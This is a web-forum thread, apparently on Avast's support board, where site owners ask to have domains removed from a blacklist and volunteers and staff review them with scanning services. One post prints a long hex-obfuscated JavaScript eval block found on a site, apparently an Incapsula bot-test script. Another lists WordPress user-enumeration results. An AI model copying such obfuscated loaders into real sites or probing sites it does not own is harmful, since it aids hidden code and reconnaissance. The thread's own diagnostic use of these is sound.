COMODO RSA Domain Validation Secure Server CAIntermediate certificate
*.hostmonster.comTested certificate.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: DavidR on April 15, 2016, 12:23:44 AM
<snip>
Our website wXw.emailmarketingdesign.co.uk appears on your phishing blacklist.

It's not a phishing website so can you please get this removed this asap.
<snip>

As Eddy mentions - I'm not getting any blocking or alerts - avast 2016 11.2.2261 and firefox 45.0.2.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 15, 2016, 12:38:45 AM
Neither have I, but I would pay attention to the Nominet alert and look into this issue.
Also the WOT third party web rep alerts need to be analyzed.
Avast is not blacklisting and the website is not malicious per se.
You do not score a miserable F-Status here, but a slightly better E-Status:
https://securityheaders.io/?q=https%3A%2F%2Fwww.rightscale.com%2F

polonus
Title: Re: How to remove my website from your blacklist?
Post by: DavidR on April 15, 2016, 01:13:14 AM
Neither have I, but I would pay attention to the Nominet alert and look into this issue.
Also the WOT third party web rep alerts need to be analyzed.
Avast is not blacklisting and the website is not malicious per se.
You do not score a miserable F-Status here, but a slightly better E-Status:
https://securityheaders.io/?q=https%3A%2F%2Fwww.rightscale.com%2F

polonus

@ polonus
Whilst it is certainly something which the site should consider. The point in question is avast blocking or alerting on the site, which it isn't.

@ Eddy & karlh74
As far as phishing goes, the avast browser add-on AOS (Avast Online Security) does look out for phishing sites. But the AOS rating for the site doesn't mention that.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on April 15, 2016, 06:42:22 AM
Hi DavidR,

Well read what I say there  earlier
Quote
neither have I
meaning that I  haven't experienced an Avast blocking nor alerting of aforementioned site. The questioon was so answered by me. Additional info is just informative and to the benefit of the site-owner.

polonus
Title: Re: How to remove my website http://nontonindramaonline.com from your blacklist?
Post by: Surya13 on May 16, 2016, 06:03:05 PM
hey,, dear webmaster my website http://nontonindramaonline.com/ clean for malware please unblocking my website
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 16, 2016, 06:18:20 PM
Blacklisted :
http://zulu.zscaler.com/submission/show/3b5d837397b7a504e8005d629956ad26-1463413853
http://quttera.com/labs-data-url/nontonindramaonline.com

Phishing detected :
https://www.virustotal.com/en/url/d3e9ce41bdebec909960a07f6fa8c1d02cdcd24af8119aefd9c63dd1462b8246/analysis/1463414914/
http://www.urlvoid.com/scan/nontonindramaonline.com/
https://sitecheck.sucuri.net/results/nontonindramaonline.com
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 16, 2016, 06:52:39 PM
Checking for cloaking
There is a difference of 32 bytes between the version of the page you serve to Chrome and the version you serve to GoogleBot. This probably means some code is running on your site that's trying to hide from browsers but make Google think there's something else on the page: http://isithacked.com/check/http%3A%2F%2Fnontonindramaonline.com%2F%20
See F-Status here: https://securityheaders.io/?q=http%3A%2F%2Fnontonindramaonline.com%2F

Various issues: https://sritest.io/#report/13e32453-51fd-491b-b16c-b41da6e1b6c4

jQuery libraries are secure...some blockable scripst for script- and ad-blockers detected.

WordPress: check on plug-in:    js_composer

PHP vulnerability: http://www.ubuntu.com/usn/usn-2952-1/  (take up with Cloudflare)...


polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: djshorty on May 21, 2016, 07:53:35 PM
My website filmoljupci.com is blacklisted.
my site is clean and safe
http://www.urlvoid.com/scan/filmoljupci.com/
https://www.virustotal.com/en/url/83f48e57534186103cac0e4be91c94e232acc214c574e42b5f4d6a2991d06a93/analysis/1463853088/
so please remove it from blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on May 21, 2016, 08:04:38 PM
IP history  https://www.virustotal.com/nb/ip-address/213.174.157.150/information/
click more button under list(s) for more info
Multiple domains on same IP and many are blacklisted


IPvoid > http://www.urlvoid.com/ip/213.174.157.150
Quote
IP ADDRESS: 213.174.157.150

We have found in our database of already analyzed websites that there are 91 websites hosted in the same web server with IP address 213.174.157.150 and IP hostname dev150.ucoz.net. Remember that it is not good to have too many websites located in the same web server because if a website gets infected by malware, it can easily affect the online reputation of the IP address and also of all the other websites.




Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 21, 2016, 08:23:23 PM
Lots of suspicious things, likely links to blacklisted sites/IP's.
Iframes are deprecated since HTML version 4.01 and obsolete since version 5 :
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=filmoljupci.com

Blacklistes sites/links on that ASN :
http://urlquery.net/report.php?id=1463853205832
http://urlquery.net/report.php?id=1463853277447

Huge amount of malicious sites/files on that IP (as Pondus already said) :
https://www.virustotal.com/en/ip-address/213.174.157.150/information/

Insecure headers :
https://securityheaders.io/?q=filmoljupci.com

JQuery vulnerabilities :
http://retire.insecurity.today/#!/scan/9f35e7d10a3bb40a2cd091f3984ffe65d1cb8d20996ad1560c4ce5685a7f559a

SSL/TLS issues :
https://www.ssllabs.com/ssltest/analyze.html?d=filmoljupci.com&ignoreMismatch=on&latest

Blacklisted IP (for very good reasons) :
http://zulu.zscaler.com/submission/show/9b3cf2cff66b4f3e90921de6ddff7b9f-1463854191
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 21, 2016, 11:13:56 PM
Yep Eddy, all true what you report, but there is also a hidden iFrame <iframe id="mchatIfm2" style="width:100%;height:300px" frameborder="0" scrolling="auto" hspace="0" vspace="0" allowtransparency="true" src="/mchat/"></iframe>  sidebar chat is a nuisance, no malware of course....larin-chat-brbljaonica but it has 100% IDS tracking insecurity. Let them make it more secure.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: djshorty on May 22, 2016, 08:25:12 PM
I have fixed problem with chat in sidebar, now only logged in users can see it.
and that website is created in ucoz website builder
ucoz.com, so all those website hosted on 213.174.157.150 that are blacklisted are not mine and i cant fix that.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 22, 2016, 08:51:28 PM
Your only chance is to ask an Avast Team Member to throw an exclusion for your website domain on that general blocking of the baddies there.
We cannot help you as we are volunteers with relevant knowledge and only Avast Team Members can unblock. Wait for an Avast Team Member to reply here in this thread and you may be lucky. I have PM-ed him.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 22, 2016, 08:54:30 PM
Get dedicated hosting.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 23, 2016, 09:05:56 AM
filmoljupci.com/publ removed from our blacklist ;)
Title: Re: How to remove my website from your blacklist?
Post by: User5247 on May 27, 2016, 04:39:20 AM
Hello, Avast is blocking the mayority of the posts of my adult site http://streamjav.org/. I have scanned the site in a multiple of malware pages and the result was that the site is clean, but avast continues blocking the content; Specifically posts with the tag jav, minimum, lolita; So what is wrong?
Thank you.-
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 27, 2016, 08:56:23 AM
streamjav.org unblocked ;)
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 27, 2016, 09:08:35 AM
There is however a setup problem on that site.
Keeps giving the error flash srcnotfound
Title: Re: How to remove my website from your blacklist?
Post by: postmaster8 on June 15, 2016, 06:00:14 PM
My website www.france-choroideremie.org is blacklisted.
But now my site is clean and safe

https://www.virustotal.com/fr/url/97b62dc7b1a5b69b13b301db376d182cfd4ecdbfeda26f8012a2fa884161ccc9/analysis/

so please remove it from blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on June 15, 2016, 06:04:37 PM
-> https://sitecheck.sucuri.net/results/www.france-choroideremie.org/
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 15, 2016, 06:12:10 PM
Yup, we did spot malware on it 2 weeks ago: france-choroideremie[.]org/counter/?ad=1bh52yqdx22ecanmhw4pitfrbpufnfcphj&ky=olrn969fejpp24c92ys5yiycijpn2umtvcnt&id=y5pjzaa6rhr1mywndiiabyzwrmbcpou6hedhfqkcpedltvgn2qupuoiuzclu5juzqbnnrfv16uhsfihxbrlq26eokkhr0q&rnd=02

I hope the infection has been healed already, so I am unblocking it now.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 15, 2016, 06:19:33 PM
Although the malware on france-choroideremie.org is gone, there is still the issue of outdated software that needs to be fixed.
Title: Re: How to remove my website from your blacklist?
Post by: patrickruizflores on June 18, 2016, 12:29:04 PM
Hello, My website www.pronunciaciones.com was blacklisted since Jun, 17th, 2016 I did everything I could to fix the issues. Could you take it off the black list please. Maybe I missed something It'd be great if you can give me some advice about it. Thank you .
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 18, 2016, 12:36:06 PM
Quote
I did everything I could to fix the issues
No, you did not.
You didn't even do the most important thing.
Stepping away from GoDaddy.
https://forum.avast.com/index.php?topic=187562.msg1319445#msg1319445
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 18, 2016, 12:43:35 PM
I removed the block on pronunciaciones.com ;) However, as Eddy pointed out, there have been a lot of malicious domains on the same IP recently, which might indicate a server security breach...
Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 27, 2016, 10:00:44 PM
my site is being blocked : www.sonjiniportreti.com which redirects to my hosting sonjiniportreti.thats.im (free googiehost company) .Can anyone help me please. i went on virustotal ,and site was clean

https://www.virustotal.com/en/url/7b115b4d7b09ed673b2e65f71bc9df480b4a42d3ae33595c4484aaf0f360fa6f/analysis/1467056294/ (https://www.virustotal.com/en/url/7b115b4d7b09ed673b2e65f71bc9df480b4a42d3ae33595c4484aaf0f360fa6f/analysis/1467056294/)

https://www.virustotal.com/en/url/6908fd5bb5a06d18450ed0c1ba05706121d788c3bf8b88c1012b9dd9b38f7b5b/analysis/1467057571/ (https://www.virustotal.com/en/url/6908fd5bb5a06d18450ed0c1ba05706121d788c3bf8b88c1012b9dd9b38f7b5b/analysis/1467057571/)
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 27, 2016, 10:05:30 PM
Quote
i went on virustotal ,and site was clean
Virustotal does not scan the website, it check url against blacklists

sonjiniportreti.thats.im/wp/  >>  https://safeweb.norton.com/report/show?url=sonjiniportreti.thats.im

IP history:
https://www.virustotal.com/en/ip-address/74.208.236.17/information/

https://www.virustotal.com/en/ip-address/206.72.206.123/information/

Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 27, 2016, 10:09:55 PM
Those 2 subdomains arent mine  :(

Threat Report
small-warning
Security Risks
Threats found: 1 
Here is a complete list: (for more information about a specific threat, click on the Threat Name below)

Threat Name:
Web Attack: Malicious Toolkit Iframe Injection
Location:
http://dorybi.thats.im/sa/hes/13/sprej-losen-dlya-ukrepleniya-i-rost.php

small-warning
Phishing Attacks
Threats found: 1 
Here is a complete list: (for more information about a specific threat, click on the Threat Name below)

Location:
http://serve.thats.im/login

So if i completely remove that free subdomain ,and use only mine .com , i will be safe?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 27, 2016, 10:14:04 PM
Quote
So if i completely remove that free subdomain ,and use only mine .com , i will be safe?
@HonzaZ is notified, he is the one with all the answers

Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 27, 2016, 10:21:18 PM
Quote
So if i completely remove that free subdomain ,and use only mine .com , i will be safe?
@HonzaZ is notified, he is the one with all the answers

Thanks , im just realising how this works.It seems like im hurt by other users on same server IP,and other users in same "thats.im" domain . I'll need advice if leaving this free hosting company is only choice to avoid further problems.But if this kind of things happen on other hostings too,moving is pointless?
Title: Re: How to remove my website from your blacklist?
Post by: Secondmineboy on June 27, 2016, 10:48:37 PM
Quote
So if i completely remove that free subdomain ,and use only mine .com , i will be safe?
@HonzaZ is notified, he is the one with all the answers

Thanks , im just realising how this works.It seems like im hurt by other users on same server IP,and other users in same "thats.im" domain . I'll need advice if leaving this free hosting company is only choice to avoid further problems.But if this kind of things happen on other hostings too,moving is pointless?

Moving isnt totally pointless a VPS or server is always best, harder to maintain but you get more control on security and privacy of course in exchange.

You can stay at the same company you use right now being Interserver in case its correct they also have VPSes and dedicated servers and i guess they can help you with setting up and moving over.

Otherwise maybe you can check out OVH as hosting company or STRATO (germany), HostEurope (Germany), Hetzner Online GmbH (Germany), Online.net or MyVirtualServer (Small company from Germany, good support and pretty cheap VPSes).

As web server i recommend NGINX (FREE) or LiteSpeed (Free or paid depending on version).

OS mostly used is Linux, which one is up to you, Debian or CentOS are the most-widely used ones on servers, DONT FORGET TO SECURE THEM.
Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 27, 2016, 11:00:49 PM
Thanks Steven for your elaborate opinion.I was a fool for believing i can have site for free.  :'(
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on June 27, 2016, 11:15:13 PM
Thanks Steven for your elaborate opinion.I was a fool for believing i can have site for free.  :'(
Google Sites is free and has worked for me. :)
Title: Re: How to remove my website from your blacklist?
Post by: Secondmineboy on June 27, 2016, 11:47:52 PM
Thanks Steven for your elaborate opinion.I was a fool for believing i can have site for free.  :'(

Well you can have sites for free problem is that these are shared so you have one server that hosts dozends of sites and when one site is malicious on that server some AVs and security softwares start blocking the IP and therefore ANY site on that one server.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 27, 2016, 11:57:15 PM
The shared IP domain status with the risk of being blocked,
because of bad-behaving neighbours is always existing.
Free has always come "at a price".
If that is allright for you and you do not mind, then it works for you.
On their Google monoculture platforms that price has a name and is called "AdMob",
showing personalised ads, and when developers won't pay that price,
then their apps won't get allowed into the Google webshop.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 28, 2016, 12:01:43 AM
Thanks Steven for your elaborate opinion.I was a fool for believing i can have site for free.  :'(

Well you can have sites for free problem is that these are shared so you have one server that hosts dozends of sites and when one site is malicious on that server some AVs and security softwares start blocking the IP and therefore ANY site on that one server.

Exactly. There goes credibility out of window. You cant have people trust your site when its flagged as infected. I cant show site to friends and mention every time what false positive means.. I had idea that only load time or uptime would be affected with 0 price. Not complete disaster of red flag horn saying im trying to trick my friends.
Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 28, 2016, 12:16:10 AM
The shared IP domain status with the risk of being blocked,
because of bad-behaving neighbours is always existing.
Free has always come "at a price".
If that is allright for you and you do not mind, then it works for you.
On their Google monoculture platforms that price has a name and is called "AdMob",
showing personalised ads, and when developers won't pay that price,
then their apps won't get allowed into the Google webshop.

polonus
I expected that "price" would be ninja ads or something like that . So i checked from several IPs and was happy to find none. I knew "free" would bite me very soon, just didnt know how.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 28, 2016, 07:32:17 AM
Looks to me the problem is really easy to solve.
Don't use frames.
Frames where deprecated in HTML-4 and are obsolete in HTML-5
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 28, 2016, 09:15:19 AM
@HonzaZ is notified, he is the one with all the answers
I wish :D

Anyway, we block whole "thats.im", I can see a couple hundred subdomains on that domain and most of them are randomly generated, therefore highly suspicious.
The fact that we haven't been contacted by anyone else in the 6 months we have been blocking it also indicates that there are not many legit sites.

I suggest moving to another hosting. As others pointed out, dedicated (or at least paid) hostings usually have much better quality, but I think for a small website and a small number of visitors, some (other) free one might be suitable as well... Good luck ;)!
Title: Re: How to remove my website from your blacklist?
Post by: Shone on June 30, 2016, 04:37:16 AM
i rehosted my site . http://s633037578.onlinehome.us/ is this whitelisted, it seems so.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 30, 2016, 10:26:39 AM
There is malicious activity detected on that ASN :
http://urlquery.net/report.php?id=1467274091340
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 30, 2016, 12:12:53 PM
Also your WordPress settings are insecure: Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   fragmaster   fragmaster
2      None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Re: http://toolbar.netcraft.com/site_report?url=http://s633037578.onlinehome.us

SRI Hash status A = OK, this here has a meagre F-Status: https://securityheaders.io/?q=http%3A%2F%2Fs633037578.onlinehome.us%2F&followRedirects=on

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: miguel167 on June 30, 2016, 05:37:16 PM
Hello.

I have a little Magento ecommerce http://ribastiendaonline.com One month ago was hacked but now is clean. I noticed that Avast users get warning advise. I think my website is clean now. Can you give a feedback to know whats is the problem?

Thank you so much!

Regards
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 30, 2016, 05:49:02 PM
On several blacklists
https://www.virustotal.com/en/url/e63b70fa6cc84825d0a16382f01a86b6e11fe4e81b7592d52521bfcbcba23951/analysis/1467301648/

urlvoid  >>  http://www.urlvoid.com/scan/ribastiendaonline.com/

IP history  >>  https://www.virustotal.com/en/ip-address/185.92.247.46/information/

Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 30, 2016, 06:44:46 PM
According to Phishcheck it is likely a PHISH: http://phishcheck.me/9065/details
Libraries detected to be retired: http://retire.insecurity.today/#!/scan/e12b8002b9d04fab2d2b1e90ce7b92ab3d9d06650448ada69a4ed03130e6e4c9

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Shone on July 01, 2016, 01:53:38 PM
Also your WordPress settings are insecure: Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   fragmaster   fragmaster
2      None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Re: http://toolbar.netcraft.com/site_report?url=http://s633037578.onlinehome.us

SRI Hash status A = OK, this here has a meagre F-Status: https://securityheaders.io/?q=http%3A%2F%2Fs633037578.onlinehome.us%2F&followRedirects=on

polonus (volunteer website security analyst and website error-hunter)
If im supposed to hunt loopholes and spend more time securing web site than making it, whats the point.
Ill do some research and fix what i can.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on July 01, 2016, 02:06:03 PM
Keeping a site secure and bug free is part of having a website.
A website is not a "set and forget" thing.
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on July 01, 2016, 02:09:21 PM
Keeping a site secure and bug free is part of having a website.
A website is not a "set and forget" thing.
+1
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 01, 2016, 02:29:56 PM
Yes and it is not only you.
As a website owner/ website admin you also have a responsibility towards the visitors of your website.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Shone on July 01, 2016, 04:06:42 PM
Yes and it is not only you.
As a website owner/ website admin you also have a responsibility towards the visitors of your website.

polonus

All In One WP Security & Firewall plugin.Do you recommend it?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 01, 2016, 04:25:41 PM
Hi Shone,

First pay attention to the kernel software that is often fully bug-tested, when updated and fully patched.
Kernel CMS is safe, providing the general settings are right. We discussed that.
The insecurity starts with outdated and non-patched plug-in's, even left code is worse.
That plug-in may be OK when the other conditions are also met.
Mind no plug-in is always completely safe. As is demonstrated by the fact,
that this was detected in that plug-in software quite a while ago:
https://wptavern.com/serious-flaw-discovered-in-the-all-in-one-wordpress-security-and-firewall-plugin

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Shone on July 01, 2016, 04:40:13 PM
thanks polonus  :D
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 04, 2016, 09:20:37 AM
Yup, ribastiendaonline.com was blacklisted, it even appeared in a blogpost: https://blog.mxlab.eu/2016/05/06/new-javascript-malware-upcoming-payment-1-month-notice/
I am now unblocking it, hoping that you got rid of the insecurities that caused the infection ;)
Title: Re: How to remove my website from your blacklist?
Post by: Nr_ on July 08, 2016, 09:17:45 PM
Hi.

A number of users on http://dgfamily.77forum.com/ have reported that Avast is blocking them from using the site. The site doesn't appear on any other blacklists according to both virustotal and urlvoid and I have no reason otherwise to believe that the site has been compromised.

Is it possible that the site could have been falsely flagged, and in that case, would it be possible for the block to be lifted?

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 08, 2016, 09:34:59 PM
I can access dgfamily.77forum.com without any problems. Do you have a printscreen or something that could point us to the right direction?
Title: Re: How to remove my website from your blacklist?
Post by: Nr_ on July 08, 2016, 10:08:23 PM
Interesting. I'll ask around and see if the users that reported the issues can provide a screenshot or two. Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: Nr_ on July 09, 2016, 07:30:26 AM
I heard back from one person so far and it appears that it's the forum theme that's causing issues. http://puu.sh/pV5ID.png
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 09, 2016, 08:07:45 AM
The "hitsk.in" was a false positive, and was fixed a couple of hours after the detection was released. Everything should be okay now. If your users are still seeing popups, advise them to update Avast ;)
Title: Re: How to remove my website from your blacklist?
Post by: Nr_ on July 09, 2016, 09:44:02 AM
Will do. Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: chowkaideng on July 12, 2016, 07:08:25 AM
Hi! One of my clients has his URL http://ambit.com.mx blacklisted by Avast. We have reported it as false positive several times, but always keeps being blocked. Right now we are also using Cloudflare.
What should we do in order to remove the URL from this black list?

I've scanned it with VirusTotal and other tools, and seems to be clear:
https://www.virustotal.com/en/url/1a6caf38607c4d7ddac15120b1175fb6e4c35f311c7884022dfffa9dbcf56b0d/analysis/

Thanks a lot in advance!
Dan
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on July 12, 2016, 07:23:24 AM
-> https://sitecheck.sucuri.net/results/ambit.com.mx/
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 12, 2016, 06:28:53 PM
Cannot see the site is blocked by avast nor flagged by AOS!
What you are seeing below is content generated by Incapsula not actual content from your site. Incapsula is blocking you from scanning your own site!
https://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fambit.com.mx%2F&ref_sel=GSP2&ua_sel=ff&fs=1
5 issues here: https://mxtoolbox.com/domain/ambit.com.mx/
Checking for cloaking
There is a difference of 6 bytes between the version of the page you serve to Chrome and the version you serve to GoogleBot. This probably means some code is running on your site that's trying to hide from browsers but make Google think there's something else on the page. show.
Code: [Select]
var z="";var b="7472797B766172207868723B76617220743D6E6577204461746528292E67657454696D6528293B766172207374617475733D227374617274223B7661722074696D696E673D6E65772041727261792833293B77696E646F772E6F6E756E6C6F61643D66756E6374696F6E28297B74696D696E675B325D3D22723A222B286E6577204461746528292E67657454696D6528292D74293B646F63756D656E742E637265617465456C656D656E742822696D6722292E7372633D222F5F496E63617073756C615F5265736F757263653F4553324C555243543D363726743D373826643D222B656E636F6465555249436F6D706F6E656E74287374617475732B222028222B74696D696E672E6A6F696E28292B222922297D3B69662877696E646F772E584D4C4874747052657175657374297B7868723D6E657720584D4C48747470526571756573747D656C73657B7868723D6E657720416374697665584F626A65637428224D6963726F736F66742E584D4C4854545022297D7868722E6F6E726561647973746174656368616E67653D66756E6374696F6E28297B737769746368287868722E72656164795374617465297B6361736520303A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2072657175657374206E6F7420696E697469616C697A656420223B627265616B3B6361736520313A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2073657276657220636F6E6E656374696F6E2065737461626C6973686564223B627265616B3B6361736520323A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2072657175657374207265636569766564223B627265616B3B6361736520333A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2070726F63657373696E672072657175657374223B627265616B3B6361736520343A7374617475733D22636F6D706C657465223B74696D696E675B315D3D22633A222B286E6577204461746528292E67657454696D6528292D74293B6966287868722E7374617475733D3D323030297B706172656E742E6C6F636174696F6E2E72656C6F616428297D627265616B7D7D3B74696D696E675B305D3D22733A222B286E6577204461746528292E67657454696D6528292D74293B7868722E6F70656E2822474554222C222F5F496E63617073756C615F5265736F757263653F535748414E45444C3D3837303134333132313538363435373030302C3434383439363830393830333130313834332C373535323532393437313138393835313037372C3331343939222C66616C7365293B7868722E73656E64286E756C6C297D63617463682863297B7374617475732B3D6E6577204461746528292E67657454696D6528292D742B2220696E6361705F6578633A20222B633B646F63756D656E742E637265617465456C656D656E742822696D6722292E7372633D222F5F496E63617073756C615F5265736F757263653F4553324C555243543D363726743D373826643D222B656E636F6465555249436F6D706F6E656E74287374617475732B222028222B74696D696E672E6A6F696E28292B222922297D3B";for (var i=0;i<b.length;i+=2){z=z+parseInt(b.substring(i, i+2), 16)+",";}z = z.substring(0,z.length-1); eval(eval('String.fromCharCode('+z+')'));})();
var z="";var
Code: [Select]
b="7472797B766172207868723B76617220743D6E6577204461746528292E67657454696D6528293B766172207374617475733D227374617274223B7661722074696D696E673D6E65772041727261792833293B77696E646F772E6F6E756E6C6F61643D66756E6374696F6E28297B74696D696E675B325D3D22723A222B286E6577204461746528292E67657454696D6528292D74293B646F63756D656E742E637265617465456C656D656E742822696D6722292E7372633D222F5F496E63617073756C615F5265736F757263653F4553324C555243543D363726743D373826643D222B656E636F6465555249436F6D706F6E656E74287374617475732B222028222B74696D696E672E6A6F696E28292B222922297D3B69662877696E646F772E584D4C4874747052657175657374297B7868723D6E657720584D4C48747470526571756573747D656C73657B7868723D6E657720416374697665584F626A65637428224D6963726F736F66742E584D4C4854545022297D7868722E6F6E726561647973746174656368616E67653D66756E6374696F6E28297B737769746368287868722E72656164795374617465297B6361736520303A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2072657175657374206E6F7420696E697469616C697A656420223B627265616B3B6361736520313A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2073657276657220636F6E6E656374696F6E2065737461626C6973686564223B627265616B3B6361736520323A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2072657175657374207265636569766564223B627265616B3B6361736520333A7374617475733D6E6577204461746528292E67657454696D6528292D742B223A2070726F63657373696E672072657175657374223B627265616B3B6361736520343A7374617475733D22636F6D706C657465223B74696D696E675B315D3D22633A222B286E6577204461746528292E67657454696D6528292D74293B6966287868722E7374617475733D3D323030297B706172656E742E6C6F636174696F6E2E72656C6F616428297D627265616B7D7D3B74696D696E675B305D3D22733A222B286E6577204461746528292E67657454696D6528292D74293B7868722E6F70656E2822474554222C222F5F496E63617073756C615F5265736F757263653F535748414E45444C3D383333323132323232383032363339393931332C393133363134393732363730323533313238302C31353336323036313036333232333737363231382C3331343939222C66616C7365293B7868722E73656E64286E756C6C297D63617463682863297B7374617475732B3D6E6577204461746528292E67657454696D6528292D742B2220696E6361705F6578633A20222B633B646F63756D656E742E637265617465456C656D656E742822696D6722292E7372633D222F5F496E63617073756C615F5265736F757263653F4553324C555243543D363726743D373826643D222B656E636F6465555249436F6D706F6E656E74287374617475732B222028222B74696D696E672E6A6F696E28292B222922297D3B";for (var i=0;i<b.length;i+=2){z=z+parseInt(b.substring(i, i+2), 16)+",";}z = z.substring(0,z.length-1); eval(eval('String.fromCharCode('+z+')'));})();iFrame detected:
Quote
<iframe style="display:none;visibility:hidden;" src="//content.incapsula.com/jsTest.html" id="gaIframe"></iframe>

polonus
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 13, 2016, 11:07:50 AM
I did not find anything malicious on the site, so I unblocked it. However, pay attention to insecurities/vulnerabilities other users pointed out, as it might mean an infection (and adding to the blacklist again) in the future.
Title: Re: How to remove my website from your blacklist?
Post by: chowkaideng on July 13, 2016, 04:05:39 PM
Thanks!
Yes, we are throwing away that old site and setting up a new one, even on a different server :)

I did not find anything malicious on the site, so I unblocked it. However, pay attention to insecurities/vulnerabilities other users pointed out, as it might mean an infection (and adding to the blacklist again) in the future.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on July 14, 2016, 10:48:42 AM
That is a good start, but keep in mind that a good start doesn't always mean the end is good as well.
Keep software updated and keep checking the pages on a a regular base ;)
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on July 14, 2016, 11:08:57 AM
Quote
Keep software updated and keep checking the pages on a a regular base
Or buy website monitoring / security from Sucuri > https://sucuri.net/

Title: Re: How to remove my website from your blacklist?
Post by: Michael925 on July 16, 2016, 12:35:28 AM
Hello,

Our website is reported as being in the avast blacklist. Here is the domain name: multiencargos.com

We are sure that our website is clean, therefore we would like you to take a look at it and remove it from your blacklist.

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on July 16, 2016, 12:45:12 AM
Hello,

Our website is reported as being in the avast blacklist. Here is the domain name: multiencargos.com

We are sure that our website is clean, therefore we would like you to take a look at it and remove it from your blacklist.

Thanks.
Blacklisted and Dr.Web say: known infection source
https://www.virustotal.com/en/url/68c1c765c47f3149d9f14977c2405b56e8ef5a3035ada832e59e4cc41f741674/analysis/1468622414/

IP history > multiple domains on same IP and many are blacklisted
https://www.virustotal.com/en/ip-address/66.96.149.32/information/


Title: Re: How to remove my website from your blacklist?
Post by: Michael925 on July 16, 2016, 01:27:39 AM
Hello,

Our website is reported as being in the avast blacklist. Here is the domain name: multiencargos.com

We are sure that our website is clean, therefore we would like you to take a look at it and remove it from your blacklist.

Thanks.
Blacklisted and Dr.Web say: known infection source
https://www.virustotal.com/en/url/68c1c765c47f3149d9f14977c2405b56e8ef5a3035ada832e59e4cc41f741674/analysis/1468622414/

IP history > multiple domains on same IP and many are blacklisted
https://www.virustotal.com/en/ip-address/66.96.149.32/information/

We have fully checked all website files by Dr. Web scanner (online and offline) - all clean, so there is wrong info
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on July 16, 2016, 06:37:41 AM
Blacklisted and spreading malware :
http://zulu.zscaler.com/submission/show/099e2e353345bf1159f42067580aa6c4-1468643379
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=multiencargos.com
http://www.siteadvisor.com/sites/multiencargos.com

Blacklisted :
https://www.virustotal.com/en/url/68c1c765c47f3149d9f14977c2405b56e8ef5a3035ada832e59e4cc41f741674/analysis/1468643404/
http://www.urlvoid.com/scan/multiencargos.com/

Blacklisted IP :
http://urlquery.net/report.php?id=1468642423543

Blacklisted and likely compromised :
